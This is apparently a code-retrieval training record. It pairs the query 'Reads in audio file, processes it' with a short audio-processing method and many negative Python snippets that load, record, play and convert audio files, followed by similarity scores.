print(\"Recording...\")\n\n for i in range(0, int(DEFAULT_RATE / DEFAULT_CHUNK_SIZE * RECORD_SECONDS)):\n data = stream.read(DEFAULT_CHUNK_SIZE)\n self.frames.append(data)\n\n print(\"Done.\")\n\n stream.stop_stream()\n stream.close()", "def wavplay(filename):\n\tif (os.path.isfile(filename) == False): # raise error if wrong input file\n\t\tprint(\"Input file does not exist. 
Make sure you computed the analysis/synthesis\")\n\telse:\n\t\tif sys.platform == \"linux\" or sys.platform == \"linux2\":\n\t\t # linux\n\t\t subprocess.call([\"aplay\", filename])\n\n\t\telif sys.platform == \"darwin\":\n\t\t\t# OS X\n\t\t\tsubprocess.call([\"afplay\", filename])\n\t\telse:\n\t\t\tprint(\"Platform not recognized\")", "def handle_play(self, message):\n self.audio_service.resume()", "def extract(path, quality=\"medium\"):\n\n try:\n file = ffmpeg.input(path)\n output_path = path[:-3] + \"ogg\"\n if os.path.exists(output_path):\n print(\n f\"[{colored('#','yellow')}] Audio file {colored(path2title(output_path),'green')} already exists\"\n )\n return output_path\n print(\n f\"\\n[{colored('+','green')}] Extracting audio for file %s\"\n % (colored(path2title(path), \"green\")),\n end=\"\",\n )\n from util import Animation\n\n anim = Animation()\n file.audio.output(\n output_path,\n acodec=\"libvorbis\",\n audio_bitrate=BITRATE * get_multiplier(quality),\n loglevel=0,\n ).run()\n anim.complete()\n print(\n f\"[{colored('+','green')}] Extraction completed for file %s\"\n % (colored(path2title(output_path), \"green\"))\n )\n\n except Exception as ex:\n print(\n f\"[{colored('-','red')}] There was an error extracting the audio for path {colored(path2title(output_path),'green')}: \",\n ex,\n )\n sys.exit(-1)\n\n return output_path", "def from_file(\n cls,\n audio_file,\n target_sr=None,\n int_values=False,\n offset=0,\n duration=0,\n trim=False,\n trim_ref=np.max,\n trim_top_db=60,\n trim_frame_length=2048,\n trim_hop_length=512,\n orig_sr=None,\n channel_selector=None,\n normalize_db=None,\n ref_channel=None,\n ):\n samples = None\n if isinstance(audio_file, list):\n return cls.from_file_list(\n audio_file_list=audio_file,\n target_sr=target_sr,\n int_values=int_values,\n offset=offset,\n duration=duration,\n trim=trim,\n trim_ref=trim_ref,\n trim_top_db=trim_top_db,\n trim_frame_length=trim_frame_length,\n trim_hop_length=trim_hop_length,\n orig_sr=orig_sr,\n channel_selector=channel_selector,\n normalize_db=normalize_db,\n ref_channel=ref_channel,\n )\n\n if not isinstance(audio_file, str) or os.path.splitext(audio_file)[-1] in sf_supported_formats:\n try:\n with sf.SoundFile(audio_file, 'r') as f:\n dtype = 'int32' if int_values else 'float32'\n sample_rate = f.samplerate\n if offset > 0:\n f.seek(int(offset * sample_rate))\n if duration > 0:\n samples = f.read(int(duration * sample_rate), dtype=dtype)\n else:\n samples = f.read(dtype=dtype)\n except RuntimeError as e:\n logging.error(\n f\"Loading {audio_file} via SoundFile raised RuntimeError: `{e}`. 
\"\n f\"NeMo will fallback to loading via pydub.\"\n )\n\n if hasattr(audio_file, \"seek\"):\n audio_file.seek(0)\n\n if HAVE_PYDUB and samples is None:\n try:\n samples = Audio.from_file(audio_file)\n sample_rate = samples.frame_rate\n num_channels = samples.channels\n if offset > 0:\n # pydub does things in milliseconds\n seconds = offset * 1000\n samples = samples[int(seconds) :]\n if duration > 0:\n seconds = duration * 1000\n samples = samples[: int(seconds)]\n samples = np.array(samples.get_array_of_samples())\n # For multi-channel signals, channels are stacked in a one-dimensional vector\n if num_channels > 1:\n samples = np.reshape(samples, (-1, num_channels))\n except CouldntDecodeError as err:\n logging.error(f\"Loading {audio_file} via pydub raised CouldntDecodeError: `{err}`.\")\n\n if samples is None:\n libs = \"soundfile, and pydub\" if HAVE_PYDUB else \"soundfile\"\n raise Exception(f\"Your audio file {audio_file} could not be decoded. We tried using {libs}.\")\n\n return cls(\n samples,\n sample_rate,\n target_sr=target_sr,\n trim=trim,\n trim_ref=trim_ref,\n trim_top_db=trim_top_db,\n trim_frame_length=trim_frame_length,\n trim_hop_length=trim_hop_length,\n orig_sr=orig_sr,\n channel_selector=channel_selector,\n normalize_db=normalize_db,\n ref_channel=ref_channel,\n )", "def getAudio(self):\n audioString = self.inStream.read(self.BUFFERSIZE)\n self.newAudio = True\n return numpy.fromstring(audioString, dtype=numpy.int16)", "def parse_raw(data):\n for sample in data:\n assert \"src\" in sample\n json_line = sample[\"src\"]\n obj = json.loads(json_line)\n assert \"key\" in obj\n assert \"wav\" in obj\n assert \"txt\" in obj\n key = AishellKeyMapper.encode(obj[\"key\"])\n wav_file = obj[\"wav\"]\n txt = obj[\"txt\"]\n try:\n if \"start\" in obj:\n assert \"end\" in obj\n sample_rate = torchaudio.backend.sox_io_backend.info(wav_file).sample_rate\n start_frame = int(obj[\"start\"] * sample_rate)\n end_frame = int(obj[\"end\"] * sample_rate)\n waveform, _ = torchaudio.backend.sox_io_backend.load(\n filepath=wav_file, num_frames=end_frame - start_frame, frame_offset=start_frame\n )\n else:\n waveform, sample_rate = torchaudio.load(wav_file)\n example = dict(key=key, txt=txt, wav=waveform, sample_rate=sample_rate)\n yield example\n except Exception as ex:\n logging.warning(\"Failed to read {}\".format(wav_file))", "def load_mp3(path):\r\n data, fs = librosa.core.load(path, sr=None)\r\n\r\n return fs, data", "def get_data(path):\n if path.endswith('.mp3'):\n path = prepare_file(path, path.rstrip('mp3')+'wav')\n x, sr = librosa.load(path, duration=30)\n\n else:\n x, sr = librosa.load(path, duration=30)\n directory, file_name = os.path.split(path)\n return x, sr, file_name", "def _load(self, filepath):\n import subprocess as sp\n command = ['ffmpeg',\n '-i', filepath,\n '-f', 's16le',\n '-acodec', 'pcm_s16le',\n '-ac', '1'] # channels: 2 for stereo, 1 for mono\n if self.sampling_rate != SAMPLING_RATE:\n command.extend(['-ar', str(self.sampling_rate)])\n command.append('-')\n # 30s at 44.1 kHz ~= 1.3e6\n proc = sp.run(command, stdout=sp.PIPE, bufsize=10**7, stderr=sp.DEVNULL, check=True)\n\n return np.fromstring(proc.stdout, dtype=\"int16\")", "def extract_audio(file_name, audio_directory):\n basename = os.path.splitext(os.path.basename(file_name))[0]\n audio_file_name = audio_directory + '/' + basename + '.wav'\n subprocess.call(['ffmpeg', '-y', '-i', file_name, '-ac', '1', audio_file_name])\n return audio_file_name", "def read_wav(fname, normalize=True):\n # samps_int16: N x C or 
N\n # N: number of samples\n # C: number of channels\n sampling_rate, samps_int16 = wavfile.read(fname)\n # N x C => C x N\n samps = samps_int16.astype(np.float)\n # tranpose because I used to put channel axis first\n if samps.ndim != 1:\n samps = np.transpose(samps)\n # normalize like MATLAB and librosa\n if normalize:\n samps = samps / MAX_INT16\n return sampling_rate, samps", "def read(self, path):\n pbase = os.path.splitext(path)[0]\n gsid = pbase.split('/')[-2]\n gender, sid = gsid[0], gsid[1:]\n assert sid in self._spkr_table\n phoneseq = phnread(pbase+'.PHN')\n wrdseq = phnread(pbase+'.WRD')\n transcrpt = txtread(pbase+'.TXT')\n sample = TIMITSpeech(\n *audioread(path), speaker=sid, gender=gender,\n transcript=transcrpt, phonemeseq=phoneseq,\n wordseq=wrdseq\n )\n #sample.phonemeseq = [\n # (t, PHONETABLE[p]) for t, p in sample.phonemeseq]\n return sample", "def audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n return sig", "def audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n return sig", "def read_wave(path):\n with contextlib.closing(wave.open(path, 'rb')) as wf:\n num_channels = wf.getnchannels()\n assert num_channels == 1\n sample_width = wf.getsampwidth()\n assert sample_width == 2\n sample_rate = wf.getframerate()\n assert sample_rate in (8000, 16000, 32000)\n pcm_data = wf.readframes(wf.getnframes())\n return pcm_data, sample_rate", "def read_audio(audio_paths, speaker_dict, tool, config, normalize, is_training,\n save_path=None, save_format='numpy',\n global_mean_male=None, global_mean_female=None,\n global_std_male=None, global_std_female=None,\n dtype=np.float32):\n if not is_training:\n if global_mean_male is None or global_mean_female is None:\n raise ValueError('Set mean & std computed in the training set.')\n if normalize not in ['global', 'speaker', 'utterance', 'no']:\n raise ValueError(\n 'normalize must be \"utterance\" or \"speaker\" or \"global\" or \"no\".')\n if tool not in ['htk', 'python_speech_features', 'librosa']:\n raise TypeError(\n 'tool must be \"htk\" or \"python_speech_features\"' +\n ' or \"librosa\".')\n\n audio_path_list_male, audio_path_list_female = [], []\n total_frame_num_male, total_frame_num_female = 0, 0\n total_frame_num_dict = {}\n speaker_mean_dict = {}\n\n # NOTE: 講演ごとに異なるspeakerとみなす\n\n # Loop 1: Computing global mean and statistics\n if is_training and normalize != 'no':\n print('=====> Reading audio files...')\n for i, audio_path in enumerate(tqdm(audio_paths)):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio file into utterances\n _, input_utt_sum, speaker_mean, _, total_frame_num_speaker = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n if i == 0:\n # Initialize global statistics\n feature_dim = input_utt_sum.shape[0]\n global_mean_male = np.zeros((feature_dim,), dtype=dtype)\n global_mean_female = np.zeros(\n (feature_dim,), dtype=dtype)\n global_std_male = np.zeros((feature_dim,), dtype=dtype)\n global_std_female = np.zeros((feature_dim,), dtype=dtype)\n\n # For computing global mean\n if speaker[3] == 'M':\n audio_path_list_male.append(audio_path)\n global_mean_male += input_utt_sum\n total_frame_num_male += total_frame_num_speaker\n elif speaker[3] == 'F':\n audio_path_list_female.append(audio_path)\n global_mean_female += input_utt_sum\n total_frame_num_female += total_frame_num_speaker\n else:\n raise ValueError\n\n # For computing speaker stddev\n if normalize == 'speaker':\n 
speaker_mean_dict[speaker] = speaker_mean\n total_frame_num_dict[speaker] = total_frame_num_speaker\n # NOTE: speaker mean is already computed\n\n print('=====> Computing global mean & stddev...')\n # Compute global mean per gender\n global_mean_male /= total_frame_num_male\n global_mean_female /= total_frame_num_female\n\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, _, _, _ = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n # For computing global stddev\n if speaker[3] == 'M':\n for input_utt in input_data_dict_speaker.values():\n global_std_male += np.sum(\n np.abs(input_utt - global_mean_male) ** 2, axis=0)\n elif speaker[3] == 'F':\n for input_utt in input_data_dict_speaker.values():\n global_std_female += np.sum(\n np.abs(input_utt - global_mean_female) ** 2, axis=0)\n else:\n raise ValueError\n\n # Compute global stddev per gender\n global_std_male = np.sqrt(\n global_std_male / (total_frame_num_male - 1))\n global_std_female = np.sqrt(\n global_std_female / (total_frame_num_female - 1))\n\n if save_path is not None:\n # Save global mean & std per gender\n np.save(join(save_path, 'global_mean_male.npy'),\n global_mean_male)\n np.save(join(save_path, 'global_mean_female.npy'),\n global_mean_female)\n np.save(join(save_path, 'global_std_male.npy'),\n global_std_male)\n np.save(join(save_path, 'global_std_female.npy'),\n global_std_female)\n\n # Loop 2: Normalization and Saving\n print('=====> Normalization...')\n frame_num_dict = {}\n sampPeriod, parmKind = None, None\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n if normalize == 'speaker' and is_training:\n speaker_mean = speaker_mean_dict[speaker]\n else:\n speaker_mean = None\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, speaker_mean, speaker_std, _ = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=is_training,\n sil_duration=0,\n tool=tool,\n config=config,\n mean=speaker_mean) # for compute speaker sttdev\n # NOTE: input_data_dict_speaker have been not normalized yet\n\n for utt_index, input_utt in input_data_dict_speaker.items():\n\n if normalize == 'no':\n pass\n elif normalize == 'global' or not is_training:\n # Normalize by mean & std over the training set per gender\n if speaker[3] == 'M':\n input_utt -= global_mean_male\n input_utt /= global_std_male\n elif speaker[3] == 'F':\n input_utt -= global_mean_female\n input_utt /= global_std_female\n else:\n raise ValueError\n elif normalize == 'speaker':\n # Normalize by mean & std per speaker\n input_utt = (input_utt - speaker_mean) / speaker_std\n elif normalize == 'utterance':\n # Normalize by mean & std per utterance\n utt_mean = np.mean(input_utt, axis=0, dtype=dtype)\n utt_std = np.std(input_utt, axis=0, dtype=dtype)\n input_utt = (input_utt - utt_mean) / utt_std\n else:\n raise ValueError\n\n frame_num_dict[speaker + '_' + utt_index] = input_utt.shape[0]\n\n if save_path is not None:\n # Save input features\n if save_format == 'numpy':\n input_data_save_path = mkdir_join(\n save_path, speaker, speaker + '_' + utt_index + '.npy')\n np.save(input_data_save_path, input_utt)\n elif save_format == 'htk':\n if sampPeriod is None:\n _, sampPeriod, parmKind = read(audio_path)\n write(input_utt,\n htk_path=mkdir_join(\n save_path, speaker, speaker + '_' + utt_index + '.htk'),\n sampPeriod=sampPeriod,\n 
parmKind=parmKind)\n else:\n raise ValueError('save_format is numpy or htk.')\n\n if save_path is not None:\n # Save the frame number dictionary\n with open(join(save_path, 'frame_num.pickle'), 'wb') as f:\n pickle.dump(frame_num_dict, f)\n\n return (global_mean_male, global_mean_female,\n global_std_male, global_std_female, frame_num_dict)", "def play_music1(music_file):\n clock = pygame.time.Clock()\n try:\n pygame.mixer.music.load(music_file)\n print (\"Music file %s loaded!\" % music_file)\n except pygame.error:\n print (\"File %s not found! (%s)\" % (music_file, pygame.get_error()))\n return\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n # check if playback has finished\n clock.tick(30)", "def _read_data_into_packet(self, p):\n\n length = p.length * self.disc.audio_format.bytes_per_frame\n\n if p.file_pos is None:\n # Silence, so send on null bytes to player\n p.data = '\\0' * length\n\n else:\n file_pos = p.file_pos * self.disc.audio_format.bytes_per_frame\n self.audio_file.seek(file_pos)\n\n p.data = self.audio_file.read(length)\n length -= len(p.data)\n file_pos += len(p.data)\n\n # If we didn't get all data, iterate with a timeout until\n # it's all been read or the ripping process has stopped.\n # This is not very efficient, and there's a small race\n # condition at the end of the disc, but this should be\n # very rare so keep it unoptimised for now.\n\n while length > 0 and self.is_ripping and self.is_ripping.is_set():\n time.sleep(1)\n\n self.audio_file.seek(file_pos)\n d = self.audio_file.read(length)\n\n length -= len(d)\n file_pos += len(d)\n\n p.data += d\n\n # Still didn't get all data, treat it as an exception\n if length > 0:\n raise SourceError('unexpected end of file, expected at least {0} bytes'\n .format(length))", "def load_audio(fhandle: BinaryIO, sr=None) -> Tuple[np.ndarray, float]:\n audio, sr = librosa.load(fhandle, sr=sr, mono=True)\n return audio, sr", "def make_audio(audio_path):\n content, sample_rate = librosa.load(audio_path, sr=16000)\n del sample_rate\n if content.dtype in (np.float32, np.float64):\n content = (content * np.iinfo(np.int16).max).astype(np.int16)\n return speech.RecognitionAudio(content=content.tobytes())", "def load_audio(self):\n\n self.audio_file = tkFileDialog.askopenfilename()\n self.audio_parser = AudioFileParser(self.audio_file)\n\n self.audio_entries = self.audio_parser.entries\n\n for index, entry in enumerate(self.audio_parser.entries):\n self.audio_box.insert(index, entry.word)", "def read(f, normalized=False):\r\n a = pydub.AudioSegment.from_mp3(f)\r\n y = np.array(a.get_array_of_samples())\r\n if a.channels == 2:\r\n y = y.reshape((-1, 2))\r\n if normalized:\r\n return a.frame_rate, np.float32(y) / 2**15\r\n else:\r\n return a.frame_rate, y", "def playmusic(self, soundfile):\n clock = pygame.time.Clock()\n pygame.mixer.music.load(soundfile)\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n clock.tick(FRAMERATE)", "def modulated_play(file_name,\n sample_rate = 44100,\n chunk = 1024,\n channel = 1,\n width = 2):\n\n data = np.fromfile(file_name, dtype = np.uint8)\n wave = custom.modulate(data)\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format = p.get_format_from_width(width),\n channels = channel,\n rate = sample_rate,\n output = True)\n\n stream.write(wave)\n\n stream.stop_stream()\n stream.close()\n p.terminate()", "def run(self) -> None:\n self._running = True\n while self._running:\n self._ist_mut.acquire()\n self.buff = np.zeros(params.BUF)\n for i in self.ist:\n self.buff += 
np.asarray(struct.unpack('f'*params.BUF, i.read(params.BUF)))\n self.buff /= len(self.ist)\n self._ist_mut.release()\n self.buff = self.transf.apply_all(self.buff)\n self._sou_mut.acquire()\n dels = []\n for i, s in enumerate(self.sounds):\n so_raw = s.read(params.BUF)\n if so_raw == b'':\n dels.append(i)\n continue\n so = np.asarray(struct.unpack(s.format*(len(so_raw)//s.f_size), so_raw)).astype(np.float32)\n so /= 2**(8*s.f_size-1)\n so = np.hstack((so, np.zeros(params.BUF-len(so))))*s.amp\n self.buff = np.average([self.buff, so], axis=0, weights=[.8,.2])\n for d in reversed(dels):\n del self.sounds[d]\n self._sou_mut.release()\n raw = struct.pack('f'*len(self.buff), *self.buff)\n self._ost_mut.acquire()\n for o in self.ost:\n o.write(raw)\n self._ost_mut.release()", "def read_audio_from_stream(stream, sr=None, mono=False, duration=None, exp_format=\"wav\"):\n _, file_ext = stream.filename.rsplit('.', 1)\n ext_converter = {\n 'mp3': AudioSegment.from_mp3,\n }\n converter = ext_converter.get(file_ext)\n if not converter:\n raise InvalidUsage(f\"Invalid extension: {file_ext}\")\n\n with tempfile.NamedTemporaryFile() as ntf:\n sound = converter(stream)\n sound.export(ntf, format=exp_format)\n return read_audio(ntf.name, sr, mono, duration)", "async def transcribe_wav(args: argparse.Namespace, core: Voice2JsonCore) -> None:\n from rhasspyasr import Transcription\n\n # Make sure profile has been trained\n assert core.check_trained(), \"Not trained\"\n\n # Get speech to text transcriber for profile\n transcriber = core.get_transcriber(open_transcription=args.open, debug=args.debug)\n\n # Directory to report WAV file names relative to\n relative_dir = (\n None if args.relative_directory is None else Path(args.relative_directory)\n )\n\n try:\n if args.wav_file or args.stdin_files:\n # Read WAV file paths\n wav_files = args.wav_file\n if args.stdin_files:\n _LOGGER.debug(\"Reading file paths from stdin\")\n wav_files = itertools.chain(wav_files, sys.stdin)\n\n for wav_path_str in wav_files:\n wav_path_str = wav_path_str.strip()\n\n # Load and convert\n wav_path = Path(wav_path_str)\n _LOGGER.debug(\"Transcribing %s\", wav_path)\n\n wav_data = await core.maybe_convert_wav(wav_path.read_bytes())\n\n # Transcribe\n transcription = (\n transcriber.transcribe_wav(wav_data) or Transcription.empty()\n )\n result = dataclasses.asdict(transcription)\n\n if relative_dir is None:\n # Add name of WAV file to result\n result[\"wav_name\"] = wav_path.name\n else:\n # Make relative to some directory\n result[\"wav_name\"] = str(\n wav_path.absolute().relative_to(relative_dir.absolute())\n )\n\n print_json(result)\n else:\n # Read WAV data from stdin\n _LOGGER.debug(\"Reading WAV data from stdin\")\n\n if args.input_size:\n # Number of bytes is on separate line\n line = sys.stdin.buffer.readline().strip()\n if not line:\n return\n\n num_bytes = int(line)\n while num_bytes > 0:\n # Read in WAV\n wav_data = sys.stdin.buffer.read(num_bytes)\n while len(wav_data) < num_bytes:\n wav_data = sys.stdin.buffer.read(num_bytes - len(wav_data))\n\n # Transcribe\n wav_data = await core.maybe_convert_wav(wav_data)\n transcription = (\n transcriber.transcribe_wav(wav_data) or Transcription.empty()\n )\n result = dataclasses.asdict(transcription)\n\n print_json(result)\n\n # Next WAV\n line = sys.stdin.buffer.readline().strip()\n if not line:\n break\n\n num_bytes = int(line)\n else:\n # Load and convert entire input\n wav_data = await core.maybe_convert_wav(sys.stdin.buffer.read())\n\n # Transcribe\n transcription = (\n 
transcriber.transcribe_wav(wav_data) or Transcription.empty()\n )\n result = dataclasses.asdict(transcription)\n\n print_json(result)\n finally:\n transcriber.stop()", "def single_analyze_wav(self, filePath):\n\n tChopped, vChopped, fVals,\\\n powerFFT, peakFreqs, peakAmps = Utils.AnalyzeFFT(filePath, tChop=self.settings['processing']['tChop'],\n detail=self.settings['processing']['detail'])\n\n self.analyzeDone.emit(tChopped, vChopped, fVals, powerFFT, peakFreqs, peakAmps, filePath)\n self.update_table(peakFreqs, peakAmps)", "def read(self, filename, normalize=True):\n if self.gcp == False:\n\n\t\t filepath = self.mixed_dir + filename\n\t\t sf, time_signal = wavfile.read(filepath, mmap=True)\n\n else:\n\n blob = list(self.bucket.list_blobs(prefix=filename))[0]\n # download blob as string\n file_as_string = blob.download_as_string()\n sf, time_signal = wavfile.read(io.BytesIO(file_as_string), mmap=True)\n\n\t\tif normalize == True:\n\t\t\t\n # normalization, assuming 2^15 is the highest possible quantization\n\t\t\ttime_signal = time_signal/np.power(2,15)\n\n\t\treturn time_signal", "def load_wav(wav_file):\n rate, data = wavfile.read(wav_file)\n return rate, data", "def read_audio_from_path(path: str) ->Optional[TorchAudioTuple]:\n bytes_obj = get_bytes_obj_from_path(path)\n return read_audio_from_bytes_obj(bytes_obj)", "def play(filename):\n SoundClient(blocking=True).playWave(filename)", "def read(filename):\n\n fileName, fileExtension = os.path.splitext(filename)\n wav_filename = filename\n rate, data = scipy.io.wavfile.read(str(wav_filename)) # the data is read in its native format\n if data.dtype =='int16':\n data = numpy.cast['float'](data)\n return [rate,data]", "def read_wav(filename, offset=0, nframes=None, dtype=torch.double):\n\n if nframes is None: # Load whole file\n fs, x = wavfile.read(filename, mmap=False)\n x = torch.tensor(x, dtype=dtype)\n x.unsqueeze_(dim=0)\n\n else: # Load a part\n with wave.open(filename) as f:\n fs = f.getframerate()\n f.setpos(offset)\n buff = f.readframes(nframes)\n x = torch.tensor(np.frombuffer(buff, np.int16), dtype=dtype)\n x.unsqueeze_(dim=0)\n x -= x.mean()\n\n return x.to(DEVICE), fs", "def process_sound_map():\n pass", "def map_audio(self): \n for root, dirs, files in os.walk(self.dir):\n for name in files:\n if (name.split(\".\")[-1].lower() == 'm4a' or \\\n name.split(\".\")[-1].lower() == 'mp3'):\n \n cur_path = \"{0}/{1}\".format(root, name)\n cur_file = auto.File(cur_path)\n \n artist = cur_file.artist.lower().strip()\n album = cur_file.album.lower().strip()\n title = cur_file.title.lower().strip()\n bitrate = cur_file.bitrate\n \n if not artist in self.audio_dict:\n self.audio_dict[artist] = {}\n \n if not album in self.audio_dict[artist]:\n self.audio_dict[artist][album] = {}\n \n title_key = title\n for in_album_title in self.audio_dict[artist][album]:\n if sm(None, title, in_album_title).ratio() > 0.9:\n title_key = in_album_title\n \n if not title_key in \\\n self.audio_dict[artist][album]:\n self.audio_dict[artist][album][title_key] = []\n \n self.audio_dict[artist][album][title_key].append({\n 'path': cur_path,\n 'bitrate': bitrate,\n 'file_name': name\n })\n \n return self", "def _process_audio(self, root: str, id: str) -> bool:\n path = os.path.join(root, id + \".flac\")\n si, _ = torchaudio.info(path)\n duration = (si.length / si.channels) / si.rate\n if self.max_duration is not None and duration > self.max_duration:\n return True\n self.paths.append(path)\n self.durations.append(duration)\n return False", "def 
play_prog(self):\r\n\r\n serial_number = range(47845, 47869)\r\n chord_number = range(1, 25)\r\n for i in self.cnv:\r\n # Look for matching audio files and play them.\r\n try:\r\n filename = \"audio files/{}__{}.wav\".format(serial_number[i-1], chord_number[i-1])\r\n playsound.playsound(filename)\r\n except FileNotFoundError:\r\n print('Error: audio files not found.')", "def _record_audio(self) -> io.BytesIO:\n frames = io.BytesIO()\n audio_stream = self.audio_interface.open(\n channels=self.channels,\n format=self.SAMPLE_FORMAT,\n frames_per_buffer=self.chunk_size,\n input=True,\n rate=self.framerate,\n stream_callback=functools.partial(\n self._fill_audio_buffer,\n frames))\n\n while audio_stream.is_active():\n pass\n\n audio_stream.stop_stream()\n audio_stream.close()\n\n return frames" ]
[ "0.7045707", "0.6956398", "0.6821181", "0.6742061", "0.6704527", "0.6699321", "0.6644113", "0.6615665", "0.64650714", "0.6453779", "0.63955903", "0.63811314", "0.63749427", "0.6367572", "0.63429946", "0.6340871", "0.633396", "0.6314544", "0.6308602", "0.6294938", "0.6285965", "0.62740135", "0.62489915", "0.623837", "0.6233427", "0.62217736", "0.6196891", "0.618415", "0.6141494", "0.6132818", "0.61327016", "0.6072964", "0.60648024", "0.6053477", "0.6053171", "0.604283", "0.6034881", "0.6016926", "0.6007087", "0.600231", "0.6001837", "0.59928614", "0.5991923", "0.5990197", "0.59824836", "0.5970262", "0.5936505", "0.5935647", "0.5932384", "0.59256643", "0.59164584", "0.5911463", "0.59061843", "0.58888954", "0.588063", "0.5877161", "0.5876366", "0.58651054", "0.5862576", "0.58527976", "0.5828484", "0.5814212", "0.580452", "0.5789877", "0.5788685", "0.5775275", "0.5768632", "0.5764965", "0.5760695", "0.5758041", "0.5740839", "0.5739856", "0.57366556", "0.57348984", "0.57348984", "0.5731569", "0.5728181", "0.57270306", "0.57072973", "0.56976074", "0.5685951", "0.56839347", "0.568042", "0.5676626", "0.56749207", "0.5664367", "0.5664219", "0.5659049", "0.56504446", "0.5648043", "0.5646563", "0.56454086", "0.5641915", "0.56326896", "0.56307846", "0.56233025", "0.5617952", "0.56137264", "0.5613083", "0.5612471" ]
0.72694874
0
Reads in audio file, processes it
def process_signal(self, sig, sr):
    return self._extract_function(sig, sr)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def process_audio_file(self, file_name):\n sig, sr = librosa.load(file_name, mono=True)\n return self._extract_function(sig, sr)", "def read_audio(f, downmix):\n if f.endswith('.mp3'):\n f = _mp3_hook(f)\n sr, audio = scipy.io.wavfile.read(f)\n if not audio.dtype is np.float32:\n audio = _normalize_pcm(audio)\n if downmix and len(audio.shape) == 2:\n audio = down_mix(audio)\n return sr, audio", "def audioRead(path):\n data, samplerate = sf.read(path)\n frames = data.shape[0]\n channels = len(data.shape)\n duration = 1/samplerate*frames\n return data, samplerate, path, duration, frames, channels", "def read_sound(self, inFile):\n\n # Python can natively only read \"wav\" files. To be flexible, use \"ffmpeg\" for conversion for other formats\n if not os.path.exists(inFile):\n print('{0} does not exist!'.format(inFile))\n raise FileNotFoundError\n \n (root, ext) = os.path.splitext(inFile)\n if ext[1:].lower() != 'wav':\n if self.ffmpeg_info.ffmpeg == None:\n print('Sorry, need FFMPEG for non-WAV files!')\n self.rate = None\n self.data = None\n raise NoFFMPEG_Error\n \n outFile = root + '.wav'\n cmd = [self.ffmpeg_info.ffmpeg, '-i', inFile, outFile, '-y']\n subprocess.run(cmd)\n print('Infile converted from ' + ext + ' to \".wav\"')\n \n inFile = outFile\n self.source = outFile\n\n self.rate, self.data = read(inFile)\n \n # Set the filename\n self.source = inFile\n \n # Make sure that the data are in some integer format\n # Otherwise, e.g. Windows has difficulty playing the sound\n # Note that \"self.source\" is set to \"None\", in order to\n # play the correct, converted file with \"play\"\n if not np.issubdtype(self.data.dtype, np.integer):\n self.generate_sound(self.data, self.rate)\n \n self._setInfo()\n print('data read in!')", "def readAudioFile(path):\n\n extension = os.path.splitext(path)[1]\n\n try:\n # Commented below, as we don't need this\n # #if extension.lower() == '.wav':\n # #[Fs, x] = wavfile.read(path)\n # if extension.lower() == '.aif' or extension.lower() == '.aiff':\n # s = aifc.open(path, 'r')\n # nframes = s.getnframes()\n # strsig = s.readframes(nframes)\n # x = numpy.fromstring(strsig, numpy.short).byteswap()\n # Fs = s.getframerate()\n if extension.lower() == '.mp3' or extension.lower() == '.wav' or extension.lower() == '.au' or extension.lower() == '.ogg':\n try:\n audiofile = AudioSegment.from_file(path)\n except:\n print(\"Error: file not found or other I/O error. 
\"\n \"(DECODING FAILED)\")\n return -1 ,-1\n\n if audiofile.sample_width == 2:\n data = numpy.fromstring(audiofile._data, numpy.int16)\n elif audiofile.sample_width == 4:\n data = numpy.fromstring(audiofile._data, numpy.int32)\n else:\n return -1, -1\n Fs = audiofile.frame_rate\n x = numpy.array(data[0::audiofile.channels]).T\n else:\n print(\"Error in readAudioFile(): Unknown file type!\")\n return -1, -1\n except IOError:\n print(\"Error: file not found or other I/O error.\")\n return -1, -1\n\n if x.ndim == 2:\n if x.shape[1] == 2:\n x = x.flatten()\n\n return Fs, x", "def read_audio(filename, sample_rate = 44100):\n loader = essentia.standard.MonoLoader(filename = filename, sampleRate = sample_rate)\n audio = loader()\n return audio", "def process_sound_file(file_path):\n\n return to_mfcc(get_wav(file_path))", "def get_audio():\n\tbuf = None\n\tnum_new_bytes = BUFFER_SIZE // REFRESH_BUFFER_FACTOR\n\twith open(INFILE) as fifo:\n\t\twhile True:\n\t\t\tif buf is None:\n\t\t\t\tbuf = fifo.read(BUFFER_SIZE)\n\t\t\telse:\n\t\t\t\tbuf = buf[num_new_bytes:] + fifo.read(num_new_bytes)\n\t\t\tyield buf", "def audio(self):\n self.log_string += 'Audio file'\n self._media_processing()", "def process_audio(fname, output_dir, poller):\n result = []\n try:\n if poller.params.candidate_transcripts is not None:\n out_path = \"{}/{}{}\".format(output_dir, os.path.splitext(os.path.basename(fname))[0], \".json\")\n else:\n out_path = \"{}/{}{}\".format(output_dir, os.path.splitext(os.path.basename(fname))[0], \".txt\")\n audio, audio_length = load_audio(fname, poller.params.model.sampleRate())\n pred = transcribe_audio(poller.params.model, audio, candidate_transcripts=poller.params.candidate_transcripts)\n with open(out_path, \"w\") as fp:\n fp.write(pred)\n result.append(out_path)\n except KeyboardInterrupt:\n poller.keyboard_interrupt()\n except:\n poller.error(\"Failed to process audio file: %s\\n%s\" % (fname, traceback.format_exc()))\n return result", "def wavread(filename):\n\n\tif (os.path.isfile(filename) == False): # raise error if wrong input file\n\t\traise ValueError(\"Input file is wrong\")\n\n\tfs, x = read(filename)\n\n\tif (len(x.shape) !=1): # raise error if more than one channel\n x = np.mean(x,axis = 1)\n\t\tprint \"Audio file is stereo, converting to mono\"\n\n\t#scale down and convert audio into floating point number in range of -1 to 1\n\tx = np.float32(x)/norm_fact[x.dtype.name]\n\treturn fs, x", "def play_audio_file(self, fname=DETECT_DONG):\n ding_wav = wave.open(fname, 'rb')\n ding_data = ding_wav.readframes(ding_wav.getnframes())\n # with 